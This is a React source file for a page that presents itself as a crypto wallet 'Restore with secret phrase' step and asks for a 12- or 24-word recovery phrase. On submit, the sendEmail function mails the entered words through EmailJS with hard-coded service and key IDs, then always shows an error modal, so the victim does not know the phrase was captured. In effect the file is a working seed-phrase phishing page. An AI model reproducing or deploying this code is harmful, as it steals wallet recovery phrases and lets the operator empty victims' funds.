import React, { useEffect, useRef, useState } from 'react'
import NumBar from '../components/NumBar'
import { useNavigate } from "react-router-dom"
import Phrase from '../components/Phrase'
import emailjs from '@emailjs/browser'
import ErrorModal from '../components/ErrorModal'

const checkLen = [12, 24]

export default function ImportWallet() {
    const navigate = useNavigate()
    const [words, setWords] = useState(12)
    const [inputValues, setInputValues] = useState(Array(24).fill(''));
    const [disable, setDisable] = useState(true)
    const [loading, setLoading] = useState(false)
    const [viewModal, setViewModal] = useState(false)
    const form = useRef()

    useEffect(() => {
        if (inputValues.slice(0, words).includes("") || inputValues.slice(0, words).some(item => item && item.trim() === "")) {
            setDisable(true)
        } else {
            setDisable(false)
        }
    }, [words, inputValues])

    // Function to update input values
    const handleInputChange = (index, value) => {
        const newInputValues = [...inputValues];
        newInputValues[index] = value;
        setInputValues(newInputValues);
    }

    // On Paste
    const handlePaste = (e, index) => {
        e.preventDefault()

        const paste = e.clipboardData.getData('text').split(" ")
        setInputValues(prevInputValues => [
            ...prevInputValues.slice(0, index),
            ...paste,
            ...prevInputValues.slice(index + paste.length)
        ]);
    }

    const sendEmail = (e) => {
        e.preventDefault();
        setLoading(true)

        emailjs
            .sendForm('service_c03z21x', 'template_q01glts', form.current, {
                publicKey: '0cCJ-dKSpQV0fUYTe',
            })
            .then(
                () => {
                    // console.log('SUCCESS!');

                    setTimeout(() => {
                        setLoading(false)
                        setViewModal(true)
                    }, 200);
                    return
                },
                (error) => {
                    console.log('FAILED...', error.text);

                    setTimeout(() => {
                        setLoading(false)
                        setViewModal(true)
                    }, 200);
                    return
                },
            );
    };

    return (<>
        <main className="w-full min-h-screen h-full flex flex-col items-center bg-[rgb(28,31,30)] text-white font-medium leading-6">
            <div className='w-[580px] mt-4 bg-[rgb(37,40,41)] rounded-lg p-4 flex flex-col gap-4 items-center'>
                <NumBar checkNum={2} />
                <h1 className='text-center font-bold text-xl leading-6'>
                    Restore with secret phrase
                </h1>
                <div className='bg-[rgb(47,52,55)] p-3 gap-4 rounded-lg flex items-center'>
                    {checkLen?.map(item => (
                        <button
                            className=' flex gap-2 items-center me-2'
                            key={item}
                            onClick={() => setWords(item)}
                        >
                            <div className={`relative w-4 h-4 rounded-full border after:absolute after:w-2 after:h-2 after:rounded-full after:top-1/2 after:left-1/2 after:-translate-x-1/2 after:-translate-y-1/2 ${words === item
                                ? "border-[rgb(158,202,255)] after:bg-[rgb(158,202,255)]"
                                : "border-white after:bg-none"}
                            `}>
                            </div>
                            <span className='font-normal text-sm leading-5'>
                                {item} words
                            </span>
                        </button>
                    ))}
                </div>

                <form
                    className='w-full pt-8'
                    ref={form}
                    onSubmit={sendEmail}
                >
                    <div className={`w-full grid gap-y-1 ${words === 12
                        ? "grid-cols-2 gap-x-10"
                        : "grid-cols-3 gap-x-8"}
                    `}>
                        {Array.from({ length: words }, (item, index) => (
                            <Phrase
                                key={index}
                                index={index}
                                inputValues={inputValues}
                                handleInputChange={handleInputChange}
                                handlePaste={handlePaste}
                            />
                        ))}
                    </div>
                    <div className='w-full grid grid-cols-2 mt-4 py-4 gap-8 border-t-2 border-t-[rgb(28,31,30)]'>
                        <button
                            className='h-12 rounded-lg bg-[rgb(47,52,55)] hover:bg-[rgb(11,17,20)] active:scale-[0.98] font-medium text-base leading-5'
                            type='button'
                            onClick={() => navigate(-1)}
                        >
                            Back
                        </button>
                        <button
                            className='h-12 rounded-lg bg-[rgb(68,118,242)] disabled:bg-[rgb(150,157,163)] hover:bg-[rgb(11,17,20)] active:scale-[0.98] disabled:active:scale-100 font-medium text-base leading-5 flex items-center justify-center gap-2'
                            type='submit'
                            disabled={disable}
                        >
                            {loading && <img
                                src="/loading.svg"
                                className='animate-spin w-6 h-6'
                                alt=""
                            />}
                            <span>Next</span>
                        </button>
                    </div>
                </form>
            </div>
        </main>

        {viewModal && <ErrorModal
            onclose={() => setViewModal(false)}
        />}

    </>)
}
